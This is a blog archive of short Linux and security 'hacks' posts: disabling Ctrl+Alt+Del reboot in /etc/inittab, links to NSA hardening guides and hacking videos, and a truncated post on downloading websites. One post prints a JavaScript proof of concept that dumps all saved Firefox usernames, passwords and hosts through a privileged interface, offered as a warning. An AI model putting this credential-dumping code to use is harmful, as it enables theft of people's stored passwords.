Archive for the ‘Hacks/Tricks’ Category

h1

Preventing ctrol+alt+del rebooting in our machine

May 1, 2009

Edit the /etc/inittab file as root

There’s a line like this in the file

ca:12345:ctrlaltdel:/sbin/shutdown -t1 -a -r now

Just comment it, or replace it with something like this
ca:12345:ctrlaltdel:echo "Use the "shutdown -r now" command if you want to reboot the system"

Also you should read the shutdown manual. This is a part of this that I think is important if we want to lock the rebooting system.
ACCESS CONTROL
shutdown can be called from init(8) when the magic keys CTRL-ALT-DEL are pressed, by creating an appro-
priate entry in /etc/inittab. This means that everyone who has physical access to the console keyboard
can shut the system down. To prevent this, shutdown can check to see if an authorized user is logged in
on one of the virtual consoles. If shutdown is called with the -a argument (add this to the invocation
of shutdown in /etc/inittab), it checks to see if the file /etc/shutdown.allow is present. It then
compares the login names in that file with the list of people that are logged in on a virtual console
(from /var/run/utmp). Only if one of those authorized users or root is logged in, it will proceed. Oth-
erwise it will write the message

shutdown: no authorized users logged in

to the (physical) system console. The format of /etc/shutdown.allow is one user name per line. Empty
lines and comment lines (prefixed by a #) are allowed. Currently there is a limit of 32 users in this
file.

In some distros like Fedora, you must look for the /etc/event.d/control-alt-delete file to modify this event

Cheers

h1

NSA security documents

December 13, 2007

Hey, i founded a webpage full of NSA (National Security Agency) security documents of many security topics like Windows XP, Cisco IOS and much more.

http://www.quands.cat/wp/2007/12/11/guies-de-configuracio-de-seguretat-de-la-nsa/ 

h1

Stealing All your saved Firefox Passwords

October 23, 2007

We’ve to have care when we save our passwords. All of this are easy to recover (or steal!) with this simply function:

function listPW() {
if(document.location !='http://www.0x000000.com/hacks/hello.html') {
netscape.security.PrivilegeManager.enablePrivilege('UniversalXPConnect');
var pm = Components.classes["@mozilla.org/passwordmanager;1"].getService();
pm = pm.QueryInterface(Components.interfaces.nsIPasswordManager);
var enumerator = pm.enumerator;
document.writeln('Mozilla\'s idea of security, I do not store these passwords, it\'s only a PoC');
document.writeln('
');
while (enumerator.hasMoreElements()) {
try {
var np = enumerator.getNext();
np = np.QueryInterface(Components.interfaces.nsIPassword);
presult = '['+np.user+'] ['+np.password+'] ['+np.host+']
';
document.writeln(presult);
} catch(e) { }
}
} else { alert('this only runs from your PC, save the page to your desktop (CTRL+S) and open it in Firefox, then watch the Magicx!'); }
}

Be careful đŸ™‚

Source: http://www.0x000000.com/index.php?i=345&bin=101011001

h1

Downloading a entire web site

October 9, 2007

If we need to save a entire website in our drive, we can choose some applications like:

*–level=3 means that 3 sub-levels of the web will be downloaded.

h1

Interesting hacking videos

July 7, 2007

I founded this webpage yesterday, have some videos about tricks of networking, OS, etc

http://www.irongeek.com/i.php?page=security/hackingillustrated